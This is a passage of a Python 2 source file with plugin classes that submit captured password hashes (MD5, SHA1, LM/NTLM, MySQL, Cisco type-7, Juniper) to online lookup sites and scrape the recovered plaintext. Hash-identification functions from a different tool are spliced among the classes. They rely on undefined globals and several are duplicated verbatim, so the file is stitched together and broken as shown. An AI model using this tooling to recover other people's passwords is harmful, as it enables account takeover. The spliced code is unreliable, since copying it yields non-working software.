648.        
649.        
650.         if not self.isSupported (alg):
651.             return None
652.        
653.        
654.         url = "http://md5-db.de/%s.html" % (hashvalue)
655.        
656.        
657.         response = do_HTTP_request ( url )
658.        
659.        
660.         if not response:
661.             return None
662.            
663.         html = None
664.         if response:
665.             html = response.read()
666.         else:
667.             return None
668.        
669.         match = search (r'<strong>Es wurden 1 m.gliche Begriffe gefunden, die den Hash \w* verwenden:</strong><ul><li>[^<]*</li>', html)
670.        
671.         if match:
672.             return match.group().split('li>')[1][:-2]
673.         else:
674.             return None
675.  
676.  
677.  
678.  
679. class MY_ADDR:
680.    
681.     name =      "my-addr"
682.     url =       "http://md5.my-addr.com"
683.     supported_algorithm = [MD5]
684.    
685.     def isSupported (self, alg):
686.        
687.        
688.        
689.         if alg in self.supported_algorithm:
690.             return True
691.         else:
692.             return False
693.  
694.  
695.     def crack (self, hashvalue, alg):
696.        
697.        
698.        
699.        
700.        
701.         if not self.isSupported (alg):
702.             return None
703.        
704.        
705.         url = "http://md5.my-addr.com/md5_decrypt-md5_cracker_online/md5_decoder_tool.php"
706.        
707.        
708.         params = { "md5" : hashvalue,
709.                "x" : 21,
710.                "y" : 8 }
711.        
712.        
713.         response = do_HTTP_request ( url, params )
714.        
715.        
716.         html = None
717.         if response:
718.             html = response.read()
719.         else:
720.             return None
721.        
722.         match = search (r"<span class='middle_title'>Hashed string</span>: [^<]*</div>", html)
723.        
724.         if match:
725.             return match.group().split('span')[2][3:-6]
726.         else:
727.             return None
728.  
729.  
730.  
731.  
732. class MD5PASS:
733.    
734.     name =      "md5pass"
735.     url =       "http://md5pass.info"
736.     supported_algorithm = [MD5]
737.    
738.     def isSupported (self, alg):
739.        
740.        
741.        
742.         if alg in self.supported_algorithm:
743.             return True
744.         else:
745.             return False
746.  
747.  
748.     def crack (self, hashvalue, alg):
749.        
750.        
751.        
752.        
753.        
754.         if not self.isSupported (alg):
755.             return None
756.        
757.        
758.         url = self.url
759.        
760.        
761.         params = { "hash" : hashvalue,
762.                "get_pass" : "Get Pass" }
763.        
764.        
765.         response = do_HTTP_request ( url, params )
766.        
767.        
768.         html = None
769.         if response:
770.             html = response.read()
771.         else:
772.             return None
773.        
774.         match = search (r"Password - <b>[^<]*</b>", html)
775.        
776.         if match:
777.             return match.group().split('b>')[1][:-2]
778.         else:
779.             return None
780.  
781.  
782.  
783. class MD5DECRYPTION:
784.    
785.     name =      "md5decryption"
786.     url =       "http://md5decryption.com"
787.     supported_algorithm = [MD5]
788.    
789.     def isSupported (self, alg):
790.        
791.        
792.        
793.         if alg in self.supported_algorithm:
794.             return True
795.         else:
796.             return False
797.  
798.  
799.     def crack (self, hashvalue, alg):
800.        
801.        
802.        
803.        
804.        
805.         if not self.isSupported (alg):
806.             return None
807.        
808.        
809.         url = self.url
810.        
811.        
812.         params = { "hash" : hashvalue,
813.                "submit" : "Decrypt It!" }
814.        
815.        
816.         response = do_HTTP_request ( url, params )
817.        
818.        
819.         html = None
820.         if response:
821.             html = response.read()
822.         else:
823.             return None
824.        
825.         match = search (r"Decrypted Text: </b>[^<]*</font>", html)
826.        
827.         if match:
828.             return match.group().split('b>')[1][:-7]
829.         else:
830.             return None
831.  
832.  
833.  
834. class MD5CRACK:
835.    
836.     name =      "md5crack"
837.     url =       "http://md5crack.com"
838.     supported_algorithm = [MD5]
839.    
840.     def isSupported (self, alg):
841.        
842.        
843.        
844.         if alg in self.supported_algorithm:
845.             return True
846.         else:
847.             return False
848.  
849.  
850.     def crack (self, hashvalue, alg):
851.        
852.        
853.        
854.        
855.        
856.         if not self.isSupported (alg):
857.             return None
858.        
859.        
860.         url = "http://md5crack.com/crackmd5.php"
861.        
862.        
863.         params = { "term" : hashvalue,
864.                "crackbtn" : "Crack that hash baby!" }
865.        
866.        
867.         response = do_HTTP_request ( url, params )
868.        
869.        
870.         html = None
871.         if response:
872.             html = response.read()
873.         else:
874.             return None
875.        
876.         match = search (r'Found: md5\("[^"]+"\)', html)
877.        
878.         if match:
879.             return match.group().split('"')[1]
880.         else:
881.             return None
882.  
883.  
884. class MD5ONLINE:
885.    
886.     name =      "md5online"
887.     url =       "http://md5online.net"
888.     supported_algorithm = [MD5]
889.    
890.     def isSupported (self, alg):
891.        
892.        
893.        
894.         if alg in self.supported_algorithm:
895.             return True
896.         else:
897.             return False
898.  
899.  
900.     def crack (self, hashvalue, alg):
901.        
902.        
903.        
904.        
905.        
906.         if not self.isSupported (alg):
907.             return None
908.        
909.        
910.         url = self.url
911.        
912.        
913.         params = { "pass" : hashvalue,
914.                "option" : "hash2text",
915.                "send" : "Submit" }
916.        
917.        
918.         response = do_HTTP_request ( url, params )
919.        
920.        
921.         html = None
922.         if response:
923.             html = response.read()
924.         else:
925.             return None
926.        
927.         match = search (r'<center><p>md5 :<b>\w*</b> <br>pass : <b>[^<]*</b></p></table>', html)
928.        
929.         if match:
930.             return match.group().split('b>')[3][:-2]
931.         else:
932.             return None
933.  
934.  
935.  
936.  
937. class MD5_DECRYPTER:
938.    
939.     name =      "md5-decrypter"
940.     url =       "http://md5-decrypter.com"
941.     supported_algorithm = [MD5]
942.    
943.     def isSupported (self, alg):
944.        
945.        
946.        
947.         if alg in self.supported_algorithm:
948.             return True
949.         else:
950.             return False
951.  
952.  
953.     def crack (self, hashvalue, alg):
954.        
955.        
956.        
957.        
958.        
959.         if not self.isSupported (alg):
960.             return None
961.        
962.        
963.         url = self.url
964.        
965.        
966.         params = { "data[Row][cripted]" : hashvalue }
967.        
968.        
969.         response = do_HTTP_request ( url, params )
970.        
971.        
972.         html = None
973.         if response:
974.             html = response.read()
975.         else:
976.             return None
977.        
978.         match = findall (r'<b class="res">[^<]*</b>', html)
979.        
980.         if match:
981.             return match[1].split('>')[1][:-3]
982.         else:
983.             return None
984.  
985.  
986.  
987. class AUTHSECUMD5:
988.    
989.     name =      "authsecu"
990.     url =       "http://www.authsecu.com"
991.     supported_algorithm = [MD5]
992.    
993.     def isSupported (self, alg):
994.        
995.        
996.        
997.         if alg in self.supported_algorithm:
998.             return True
999.         else:
1000.             return False
1001.  
1002.  
1003.     def crack (self, hashvalue, alg):
1004.        
1005.        
1006.        
1007.        
1008.        
1009.         if not self.isSupported (alg):
1010.             return None
1011.        
1012.        
1013.         url = "http://www.authsecu.com/decrypter-dechiffrer-cracker-hash-md5/script-hash-md5.php"
1014.        
1015.        
1016.         params = { "valeur_bouton" : "dechiffrage",
1017.                "champ1" : "",
1018.                "champ2" : hashvalue,
1019.                "dechiffrer.x" : "78",
1020.                "dechiffrer.y" : "7" }
1021.        
1022.        
1023.         response = do_HTTP_request ( url, params )
1024.        
1025.        
1026.         html = None
1027.         if response:
1028.             html = response.read()
1029.         else:
1030.             return None
1031.        
1032.         match = findall (r'<td><p class="chapitre---texte-du-tableau-de-niveau-1">[^<]*</p></td>', html)
1033.        
1034.         if len(match) > 2:
1035.             return match[1].split('>')[2][:-3]
1036.         else:
1037.             return None
1038.  
1039.  
1040.  
1041. class HASHCRACK:
1042.    
1043.     name =      "hashcrack"
1044.     url =       "http://hashcrack.com"
1045.     supported_algorithm = [MD5, SHA1, MYSQL, LM, NTLM]
1046.    
1047.     def isSupported (self, alg):
1048.        
1049.        
1050.        
1051.         if alg in self.supported_algorithm:
1052.             return True
1053.         else:
1054.             return False
1055.  
1056.  
1057.  
1058.     def crack (self, hashvalue, alg):
1059.        
1060.        
1061.        
1062.        
1063.        
1064.         if not self.isSupported (alg):
1065.             return None
1066.        
1067.        
1068.         url = "http://hashcrack.com/indx.php"
1069.        
1070.         hash2 = None
1071.         if alg in [LM, NTLM] and ':' in hashvalue:
1072.             if alg == LM:
1073.                 hash2 = hashvalue.split(':')[0]
1074.             else:
1075.                 hash2 = hashvalue.split(':')[1]
1076.         else:
1077.             hash2 = hashvalue
1078.        
1079.         # Delete the possible starting '*'
1080.         if alg == MYSQL and hash2[0] == '*':
1081.             hash2 = hash2[1:]
1082.        
1083.        
1084.         params = { "auth" : "8272hgt",
1085.                "hash" : hash2,
1086.                "string" : "",
1087.                "Submit" : "Submit" }
1088.        
1089.        
1090.         response = do_HTTP_request ( url, params )
1091.        
1092.        
1093.         html = None
1094.         if response:
1095.             html = response.read()
1096.         else:
1097.             return None
1098.        
1099.         match = search (r'<div align=center>"[^"]*" resolves to</div><br><div align=center> <span class=hervorheb2>[^<]*</span></div></TD>', html)
1100.        
1101.         if match:
1102.             return match.group().split('hervorheb2>')[1][:-18]
1103.         else:
1104.             return None
1105.  
1106.  
1107.  
1108. class OPHCRACK:
1109.    
1110.     name =      "ophcrack"
1111.     url =       "http://www.objectif-securite.ch"
1112.     supported_algorithm = [LM, NTLM]
1113.    
1114.     def isSupported (self, alg):
1115.        
1116.        
1117.        
1118.         if alg in self.supported_algorithm:
1119.             return True
1120.         else:
1121.             return False
1122.  
1123.  
1124.  
1125.     def crack (self, hashvalue, alg):
1126.        
1127.        
1128.        
1129.        
1130.        
1131.         if not self.isSupported (alg):
1132.             return None
1133.        
1134.         if ':' not in hashvalue:
1135.             return None
1136.            
1137.         if hashvalue.split(':')[0] == "aad3b435b51404eeaad3b435b51404ee":
1138.             return None
1139.        
1140.        
1141.         url = "http://www.objectif-securite.ch/en/products.php?hash=%s" % (hashvalue.replace(':', '%3A'))
1142.        
1143.        
1144.         response = do_HTTP_request ( url )
1145.        
1146.        
1147.         html = None
1148.         if response:
1149.             html = response.read()
1150.         else:
1151.             return None
1152.        
1153.         match = search (r'<table><tr><td>Hash:</td><td>[^<]*</td></tr><tr><td><b>Password:</b></td><td><b>[^<]*</b></td>', html)
1154.        
1155.         if match:
1156.             return match.group().split('b>')[3][:-2]
1157.         else:
1158.             return None
1159.    
1160.  
1161.  
1162.    
1163.  
1164. def SHA256s():
1165.     hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.'
1166.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0:
1167.         jerar.append("120020")
1168.  
1169. def SHA384Django():
1170.     hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba'
1171.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0:
1172.         print " [+] SHA-384(Django)"
1173.         jerar.append("121020")
1174.  
1175. def SHA512():
1176.     hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e'
1177.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1178.         jerar.append("122020")
1179. def SHA512HMAC():
1180.     hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f'
1181.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1182.         jerar.append("122060")
1183. def Whirlpool():
1184.     hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb'
1185.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1186.         jerar.append("122040")
1187. def WhirlpoolHMAC():
1188.     hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9'
1189.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1190.         jerar.append("122080")
1191.  
1192. class C0LLISION:
1193.    
1194.     name =      "c0llision"
1195.     url =       "http://www.c0llision.net"
1196.     supported_algorithm = [MD5, LM, NTLM]
1197.    
1198.     def isSupported (self, alg):
1199.        
1200.        
1201.        
1202.         if alg in self.supported_algorithm:
1203.             return True
1204.         else:
1205.             return False
1206.  
1207.  
1208.  
1209.     def crack (self, hashvalue, alg):
1210.        
1211.        
1212.        
1213.        
1214.        
1215.         if not self.isSupported (alg):
1216.             return None
1217.        
1218.         if alg in [LM, NTLM] and ':' not in hashvalue:
1219.             return None
1220.            
1221.         response = do_HTTP_request ( "http://www.c0llision.net/webcrack.php" )
1222.         html = None
1223.         if response:
1224.             html = response.read()
1225.         else:
1226.             return None
1227.         match = search (r'<input type="hidden" name="hash._csrf_token." value="[^"]*" id="hash__csrf_token" />', html)
1228.         token = None
1229.         if match:
1230.             token = match.group().split('"')[5]
1231.        
1232.        
1233.         url = "http://www.c0llision.net/webcrack/request"
1234.        
1235.        
1236.         params = { "hash[_input_]" : hashvalue,
1237.                "hash[_csrf_token]" : token }
1238.        
1239.        
1240.         response = do_HTTP_request ( url, params )
1241.        
1242.        
1243.         html = None
1244.         if response:
1245.             html = response.read()
1246.         else:
1247.             return None
1248.        
1249.         match = None
1250.         if alg in [LM, NTLM]:
1251.             html = html.replace('\n', '')
1252.             result = ""
1253.            
1254.             match = search (r'<table class="pre">.*?</table>', html)
1255.             if match:
1256.                 try:
1257.                     doc = parseDoc ( match.group() )
1258.                 except:
1259.                     print "INFO: You need libxml2 to use this plugin."
1260.                     return None
1261.                 lines = doc.xpathEval("//tr")
1262.                 for l in lines:
1263.                     doc = parseDoc ( str(l) )
1264.                     cols = doc.xpathEval("//td")
1265.                    
1266.                     if len(cols) < 4:
1267.                         return None
1268.                    
1269.                     if cols[2].content:
1270.                         result = " > %s (%s) = %s\n" % ( cols[1].content, cols[2].content, cols[3].content )
1271.                
1272.                 return ( result and result.split()[-1] or None )
1273.            
1274.         else:
1275.             match = search (r'<td class="plaintext">[^<]*</td>', html)
1276.        
1277.             if match:
1278.                 return match.group().split('>')[1][:-4]
1279.        
1280.         return None
1281.  
1282.  
1283.  
1284. def SHA384HMAC():
1285.     hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b'
1286.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1287.         jerar.append("119040")
1288.  
1289. def SHA256s():
1290.     hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.'
1291.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0:
1292.         jerar.append("120020")
1293.  
1294. def SHA384Django():
1295.     hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba'
1296.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0:
1297.         print " [+] SHA-384(Django)"
1298.         jerar.append("121020")
1299.  
1300. def SHA512():
1301.     hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e'
1302.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1303.         jerar.append("122020")
1304. def SHA512HMAC():
1305.     hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f'
1306.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1307.         jerar.append("122060")
1308. def Whirlpool():
1309.     hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb'
1310.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1311.         jerar.append("122040")
1312. def WhirlpoolHMAC():
1313.     hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9'
1314.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1315.         jerar.append("122080")
1316.  
1317. class REDNOIZE:
1318.    
1319.     name =      "rednoize"
1320.     url =       "http://md5.rednoize.com"
1321.     supported_algorithm = [MD5, SHA1]
1322.    
1323.     def isSupported (self, alg):
1324.        
1325.        
1326.        
1327.         if alg in self.supported_algorithm:
1328.             return True
1329.         else:
1330.             return False
1331.  
1332.  
1333.     def crack (self, hashvalue, alg):
1334.        
1335.        
1336.        
1337.        
1338.        
1339.         if not self.isSupported (alg):
1340.             return None
1341.        
1342.        
1343.         url = ""
1344.         if alg == MD5:
1345.             url = "http://md5.rednoize.com/?p&s=md5&q=%s&_=" % (hashvalue)
1346.         else:
1347.             url = "http://md5.rednoize.com/?p&s=sha1&q=%s&_=" % (hashvalue)
1348.        
1349.        
1350.         response = do_HTTP_request ( url )
1351.        
1352.        
1353.         html = None
1354.         if response:
1355.             html = response.read()
1356.         else:
1357.             return None
1358.        
1359.         return html
1360.            
1361.            
1362.  
1363.  
1364. class CMD5:
1365.    
1366.     name =      "cmd5"
1367.     url =       "http://www.cmd5.org"
1368.     supported_algorithm = [MD5, NTLM]
1369.    
1370.     def isSupported (self, alg):
1371.        
1372.        
1373.        
1374.         if alg in self.supported_algorithm:
1375.             return True
1376.         else:
1377.             return False
1378.  
1379.  
1380.     def crack (self, hashvalue, alg):
1381.        
1382.        
1383.        
1384.        
1385.        
1386.         if not self.isSupported (alg):
1387.             return None
1388.        
1389.         response = do_HTTP_request ( "http://www.cmd5.org/" )
1390.         html = None
1391.         if response:
1392.             html = response.read()
1393.         else:
1394.             return None
1395.        
1396.         match = search (r'<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="[^"]*" />', html)
1397.         viewstate = None
1398.         if match:
1399.             viewstate = match.group().split('"')[7]
1400.        
1401.         match = search (r'<input type="hidden" name="ctl00.ContentPlaceHolder1.HiddenField1" id="ctl00_ContentPlaceHolder1_HiddenField1" value="[^"]*" />', html)
1402.         ContentPlaceHolder1 = ""
1403.         if match:
1404.             ContentPlaceHolder1 = match.group().split('"')[7]
1405.        
1406.         match = search (r'<input type="hidden" name="ctl00.ContentPlaceHolder1.HiddenField2" id="ctl00_ContentPlaceHolder1_HiddenField2" value="[^"]*" />', html)
1407.         ContentPlaceHolder2 = ""
1408.         if match:
1409.             ContentPlaceHolder2 = match.group().split('"')[7]
1410.        
1411.        
1412.         url = "http://www.cmd5.org/"
1413.        
1414.         hash2 = ""
1415.         if alg == MD5:
1416.             hash2 = hashvalue
1417.         else:
1418.             if ':' in hashvalue:
1419.                 hash2 = hashvalue.split(':')[1]
1420.        
1421.        
1422.         params = { "__EVENTTARGET" : "",
1423.                "__EVENTARGUMENT" : "",
1424.                "__VIEWSTATE" : viewstate,
1425.                "ctl00$ContentPlaceHolder1$TextBoxq" : hash2,
1426.                "ctl00$ContentPlaceHolder1$InputHashType" : alg,
1427.                "ctl00$ContentPlaceHolder1$Button1" : "decrypt",
1428.                "ctl00$ContentPlaceHolder1$HiddenField1" : ContentPlaceHolder1,
1429.                "ctl00$ContentPlaceHolder1$HiddenField2" : ContentPlaceHolder2 }
1430.                
1431.         header = { "Referer" : "http://www.cmd5.org/" }
1432.        
1433.        
1434.         response = do_HTTP_request ( url, params, header )
1435.        
1436.        
1437.         html = None
1438.         if response:
1439.             html = response.read()
1440.         else:
1441.             return None
1442.        
1443.         match = search (r'<span id="ctl00_ContentPlaceHolder1_LabelResult">[^<]*</span>', html)
1444.        
1445.         if match:
1446.             return match.group().split('>')[1][:-6]
1447.         else:
1448.             return None
1449.  
1450.  
1451. def SNEFRU256HMAC():
1452.     hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9'
1453.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1454.         jerar.append("115180")
1455. def SHA256md5pass():
1456.     hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4'
1457.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1458.         jerar.append("115200")
1459. def SHA256sha1pass():
1460.     hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886'
1461.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1462.         jerar.append("115220")
1463.  
1464. def MD5passsaltjoomla2():
1465.     hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2'
1466.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0:
1467.         jerar.append("116020")
1468. def SAM():
1469.     hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5'
1470.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0:
1471.         jerar.append("116040")
1472.  
1473. def SHA256Django():
1474.     hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3'
1475.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0:
1476.         jerar.append("117020")
1477.  
1478. def RipeMD320():
1479.     hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef'
1480.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1481.         jerar.append("118020")
1482. def RipeMD320HMAC():
1483.     hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78'
1484.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1485.         jerar.append("118040")
1486.  
1487. class AUTHSECUCISCO7:
1488.    
1489.     name =      "authsecu"
1490.     url =       "http://www.authsecu.com"
1491.     supported_algorithm = [CISCO7]
1492.    
1493.     def isSupported (self, alg):
1494.        
1495.        
1496.        
1497.         if alg in self.supported_algorithm:
1498.             return True
1499.         else:
1500.             return False
1501.  
1502.  
1503.  
1504.     def crack (self, hashvalue, alg):
1505.        
1506.        
1507.        
1508.        
1509.        
1510.         if not self.isSupported (alg):
1511.             return None
1512.        
1513.        
1514.         url = "http://www.authsecu.com/decrypter-dechiffrer-cracker-password-cisco-7/script-password-cisco-7-launcher.php"
1515.        
1516.        
1517.         params = { "valeur_bouton" : "dechiffrage",
1518.                "champ1" : hashvalue,
1519.                "dechiffrer.x" : 43,
1520.                "dechiffrer.y" : 16 }
1521.                
1522.        
1523.         response = do_HTTP_request ( url, params )
1524.        
1525.        
1526.         html = None
1527.         if response:
1528.             html = response.read()
1529.         else:
1530.             return None
1531.        
1532.         match = findall (r'<td><p class="chapitre---texte-du-tableau-de-niveau-1">[^<]*</p></td>', html)
1533.        
1534.         if match:
1535.             return match[1].split('>')[2][:-3]
1536.         else:
1537.             return None
1538.  
1539.  
1540.  
1541.  
1542. class CACIN:
1543.    
1544.     name =      "cacin"
1545.     url =       "http://cacin.net"
1546.     supported_algorithm = [CISCO7]
1547.    
1548.     def isSupported (self, alg):
1549.        
1550.        
1551.        
1552.         if alg in self.supported_algorithm:
1553.             return True
1554.         else:
1555.             return False
1556.  
1557.  
1558.  
1559.     def crack (self, hashvalue, alg):
1560.        
1561.        
1562.        
1563.        
1564.        
1565.         if not self.isSupported (alg):
1566.             return None
1567.        
1568.        
1569.         url = "http://cacin.net/cgi-bin/decrypt-cisco.pl?cisco_hash=%s" % (hashvalue)
1570.        
1571.        
1572.         response = do_HTTP_request ( url )
1573.        
1574.        
1575.         html = None
1576.         if response:
1577.             html = response.read()
1578.         else:
1579.             return None
1580.        
1581.         match = search (r'<tr>Cisco password 7: [^<]*</tr><br><tr><th><br>Decrypted password: .*', html)
1582.        
1583.         if match:
1584.             return match.group().split(':')[2][1:]
1585.         else:
1586.             return None
1587.  
1588.  
1589. class IBEAST:
1590.    
1591.     name =      "ibeast"
1592.     url =       "http://www.ibeast.com"
1593.     supported_algorithm = [CISCO7]
1594.    
1595.     def isSupported (self, alg):
1596.        
1597.        
1598.        
1599.         if alg in self.supported_algorithm:
1600.             return True
1601.         else:
1602.             return False
1603.  
1604.  
1605.  
1606.     def crack (self, hashvalue, alg):
1607.        
1608.        
1609.        
1610.        
1611.        
1612.         if not self.isSupported (alg):
1613.             return None
1614.        
1615.        
1616.         url = "http://www.ibeast.com/content/tools/CiscoPassword/decrypt.php?txtPassword=%s&submit1=Enviar+consulta" % (hashvalue)
1617.        
1618.        
1619.         response = do_HTTP_request ( url )
1620.        
1621.        
1622.         html = None
1623.         if response:
1624.             html = response.read()
1625.         else:
1626.             return None
1627.        
1628.         match = search (r'<font size="\+2">Your Password is [^<]*<br>', html)
1629.        
1630.         if match:
1631.             return match.group().split('is ')[1][:-4]
1632.         else:
1633.             return None
1634.  
1635.  
1636.  
1637. def SHA256():
1638.     hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e'
1639.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1640.         jerar.append("115020")
1641. def SHA256HMAC():
1642.     hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132'
1643.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1644.         jerar.append("115120")
1645. def Haval256():
1646.     hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a'
1647.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1648.         jerar.append("115040")
1649. def Haval256HMAC():
1650.     hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a'
1651.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1652.         jerar.append("115140")
1653. def GOSTR341194():
1654.     hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793'
1655.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1656.         jerar.append("115060")
1657. def RipeMD256():
1658.     hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af'
1659.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1660.         jerar.append("115080")
1661. def RipeMD256HMAC():
1662.     hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf'
1663.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1664.         jerar.append("115160")
1665. def SNEFRU256():
1666.     hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb'
1667.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1668.         jerar.append("115100")
1669.  
1670. def SHA384():
1671.     hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b'
1672.     if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True:
1673.         jerar.append("119020")
1674.  
1675.  
1676. class PASSWORD_DECRYPT:
1677.    
1678.     name =      "password-decrypt"
1679.     url =       "http://password-decrypt.com"
1680.     supported_algorithm = [CISCO7, JUNIPER]
1681.    
1682.     def isSupported (self, alg):
1683.        
1684.        
1685.        
1686.         if alg in self.supported_algorithm:
1687.             return True
1688.         else:
1689.             return False
1690.  
1691.  
1692.  
1693.     def crack (self, hashvalue, alg):
1694.        
1695.        
1696.        
1697.        
1698.        
1699.         if not self.isSupported (alg):
1700.             return None
1701.        
1702.        
1703.         url = ""
1704.         params = None
1705.         if alg == CISCO7:
1706.             url = "http://password-decrypt.com/cisco.cgi"
1707.             params = { "submit" : "Submit",
1708.                 "cisco_password" : hashvalue,
1709.                 "submit" : "Submit" }
1710.         else:
1711.             url = "http://password-decrypt.com/juniper.cgi"
1712.             params = { "submit" : "Submit",
1713.                 "juniper_password" : hashvalue,
1714.                 "submit" : "Submit" }
1715.        
1716.        
1717.        
1718.         response = do_HTTP_request ( url, params )
1719.        
1720.        
1721.         html = None
1722.         if response:
1723.             html = response.read()
1724.         else:
1725.             return None
1726.        
1727.         match = search (r'Decrypted Password:&nbsp;<B>[^<]*</B> </p>', html)
1728.        
1729.         if match:
1730.             return match.group().split('B>')[1][:-2]
1731.         else:
1732.             return None
1733.  
1734.  
1735.  
1736.  
1737. class BIGTRAPEZE:
1738.    
1739.     name =      "bigtrapeze"
1740.     url =       "http://www.bigtrapeze.com"
1741.     supported_algorithm = [MD5]
1742.    
1743.     def isSupported (self, alg):
1744.        
1745.        
1746.        
1747.         if alg in self.supported_algorithm:
1748.             return True
1749.         else:
1750.             return False
1751.  
1752.  
1753.  
1754.     def crack (self, hashvalue, alg):
1755.        
1756.        
1757.        
1758.        
1759.        
1760.         if not self.isSupported (alg):
1761.             return None
1762.        
1763.        
